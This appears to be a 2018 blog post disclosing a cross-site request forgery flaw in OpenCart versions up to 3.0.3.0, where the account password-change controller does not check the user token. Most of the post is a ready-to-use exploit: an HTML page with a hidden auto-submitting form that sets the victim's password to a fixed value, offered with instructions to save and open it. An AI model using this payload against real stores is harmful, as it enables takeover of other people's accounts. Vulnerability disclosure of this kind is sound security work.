
目前显示的是 六月, 2018的博文

Opencart-v3-0-3-0 user changes password at csrf vulnerability

Software Link: https://github.com/opencart/opencart/ Date: 06.28.2018 Exploit Author:CK01 Version:<= V3-0-3-0 0x00 Vulnerability analysis       The user token was not verified at the password change, causing the csrf vulnerability to modify the user password  /upload/catalog/controller/account/password.php 0x01 Exploit Save the following exp as html and open the run <html>   <body>     <form id="post123" name="post123" action="" method="POST" enctype="multipart/form-data">   <input type="hidden" name="password" value="CK01ck01" />       <input type="hidden" name="confirm" value="CK01ck01" /> <script>         document.getElementById('post123').submit();  </script>     </form>   </body> </html>...